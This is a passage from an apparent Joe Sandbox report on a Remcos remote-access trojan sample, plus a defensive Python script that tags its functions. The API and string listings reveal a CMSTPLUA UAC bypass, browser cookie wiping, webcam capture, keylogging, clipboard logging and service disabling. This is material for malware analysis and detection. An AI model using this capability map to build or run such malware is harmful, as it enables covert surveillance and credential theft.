                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                • API String ID: 3851391207-1840432179
                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                • int.LIBCPMT ref: 0040FEF2
                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: H]G
                                                • API String ID: 2536120697-1717957184
                                                • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                Strings
                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                • UserProfile, xrefs: 0040B2B4
                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                • API String ID: 2018770650-304995407
                                                • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                APIs
                                                • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$AllocOutputShowWindow
                                                • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                • API String ID: 2425139147-2527699604
                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$BG
                                                • API String ID: 0-3446331285
                                                • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                APIs
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                • Sleep.KERNEL32(00002710), ref: 00419F79
                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                • String ID: Alarm triggered$`#v
                                                • API String ID: 614609389-3049340936
                                                • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                APIs
                                                • __allrem.LIBCMT ref: 00439789
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                • __allrem.LIBCMT ref: 004397BC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                • __allrem.LIBCMT ref: 004397F1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftoe
                                                • String ID:
                                                • API String ID: 4189289331-0
                                                • Opcode ID: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                • Opcode Fuzzy Hash: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16
                                                • String ID: a/p$am/pm
                                                • API String ID: 3509577899-3206640213
                                                • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: H_prologSleep
                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                • API String ID: 3469354165-462540288
                                                • Opcode ID: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                • Opcode Fuzzy Hash: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                • String ID:
                                                • API String ID: 493672254-0
                                                • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
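The function entries above record the sample's capabilities only as raw API lists and string IDs: the IE and Chrome cookie wipers (RegOpenKeyExA on 0x80000001, PathFileExistsA, DeleteFileA), the http://geoplugin.net/json.gp geolocation lookup, the ProductName/CurrentBuildNumber fingerprinting, the CoGetObject call beside the ucmCMLuaUtilShellExecMethod string, and the ChangeServiceConfigW call whose third argument is 4. The script below is an added triage helper written for this page, not Joe Sandbox's or the sample's own code: it parses entries in this format, decodes the few argument constants worth knowing (0x80000001 = HKEY_CURRENT_USER, dwStartType 4 = SERVICE_DISABLED, 0x24 = sizeof(BIND_OPTS3) on 32-bit, the structure passed to CoGetObject for an elevation moniker) and tags each entry with the capability its evidence supports. The tag names, the constant tables and the "elevation moniker pattern" reading of the 0x24 argument are the editor's own assumptions; SAMPLE is an excerpt of three entries copied from this report so the script runs offline.

```python
"""Added triage helper for Joe Sandbox function entries (the APIs / String ID
blocks above). Example code written for this page, not Joe Sandbox's or the
sample's own; tag names, constant tables and the BIND_OPTS3 note are the
editor's assumptions, and SAMPLE is an excerpt copied from this report."""
import re
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: addr", optionally prefixed "Part of subcall function X:"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?")
STRING_ID_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")
ENTRY_END = "Instruction Fuzzy Hash:"          # last field of every entry
HKEY = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
START_TYPE = {2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START",
              4: "SERVICE_DISABLED", 0xFFFFFFFF: "SERVICE_NO_CHANGE"}
BIND_OPTS3_X86 = 0x24   # sizeof(BIND_OPTS3) on 32-bit, the struct used with elevation monikers

@dataclass
class Call:
    name: str
    module: str
    args: list
    subcall: str = ""   # callee address when listed as "Part of subcall function"

@dataclass
class Entry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    notes: list = field(default_factory=list)
    tags: list = field(default_factory=list)

def _hexarg(arg):
    """Arguments are hex words; '?' (unknown) and text arguments decode to None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def parse_entries(text):
    entries, cur = [], Entry()
    for raw in text.splitlines():
        line = raw.strip()
        if ENTRY_END in line:                 # entry boundary
            entries.append(cur)
            cur = Entry()
        elif (m := API_RE.match(line)):
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.calls.append(Call(m.group("name"), m.group("module"), args, m.group("sub") or ""))
        elif (m := STRING_ID_RE.match(line)):
            cur.strings.extend(s for s in m.group("ids").split("$") if s)
    if cur.calls or cur.strings:              # trailing entry without a hash line
        entries.append(cur)
    return entries

def tag_entry(e):
    names = {c.name for c in e.calls}
    blob = " ".join(e.strings)
    for c in e.calls:
        if c.name.startswith("RegOpenKeyEx") and c.args:
            hive = HKEY.get(_hexarg(c.args[0]))
            if hive:
                e.notes.append(f"{c.name} on {hive}")
        elif c.name.startswith("ChangeServiceConfig") and len(c.args) > 2:
            st = _hexarg(c.args[2])           # dwStartType is the third parameter
            if st is not None:
                e.notes.append(f"dwStartType={START_TYPE.get(st, hex(st))}")
                if st == 4:
                    e.tags.append("service-disable")
        elif c.name == "CoGetObject" and len(c.args) > 1 and _hexarg(c.args[1]) == BIND_OPTS3_X86:
            e.notes.append("CoGetObject with 0x24-byte BIND_OPTS3 (elevation moniker pattern)")
    if "geoplugin.net" in blob:
        e.tags.append("geolocation-lookup")
    if "Cookies" in blob and names & {"DeleteFileA", "PathFileExistsA"}:
        e.tags.append("browser-cookie-wipe")
    if {"CurrentBuildNumber", "ProductName"} <= set(e.strings):
        e.tags.append("os-fingerprint")
    if "ucmCMLuaUtilShellExecMethod" in blob and "CoGetObject" in names:
        e.tags.append("uac-bypass-cmstplua")
    if {"OpenCamera", "GetFrame"} <= set(e.strings):
        e.tags.append("webcam-capture")
    return e

def triage(text):
    return [tag_entry(e) for e in parse_entries(text)]

# Three entries copied from this report (other fields trimmed).
SAMPLE = r"""APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] ucmCMLuaUtilShellExecMethod
• Instruction Fuzzy Hash: A001C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
• GetLastError.KERNEL32 ref: 0040B2EE
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
• Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
"""

if __name__ == "__main__":
    for i, e in enumerate(triage(SAMPLE)):
        print(i, [c.name for c in e.calls], e.tags, e.notes)
```

Run against the full function listing, the script reports the three entries in SAMPLE as uac-bypass-cmstplua (with the BIND_OPTS3 note), browser-cookie-wipe and service-disable, and the IE cookie and OS fingerprint entries above gain a "RegOpenKeyExA on HKEY_CURRENT_USER" note. The tags are evidence-level labels for prioritising which functions to open in the disassembler, not verdicts; the CoGetObject note in particular only says the argument size matches the elevation-moniker pattern that the ucmCMLuaUtil strings already point to.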
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                • _free.LIBCMT ref: 00446EF6
                                                • _free.LIBCMT ref: 00446F1E
                                                • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                • _abort.LIBCMT ref: 00446F3D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                APIs
                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Enum$InfoQueryValue
                                                • String ID: [regsplt]$DG
                                                • API String ID: 3554306468-1089238109
                                                • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                APIs
                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                • API String ID: 2974294136-753205382
                                                • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                APIs
                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                • wsprintfW.USER32 ref: 0040A905
                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                Strings
                                                Memory Dump Source
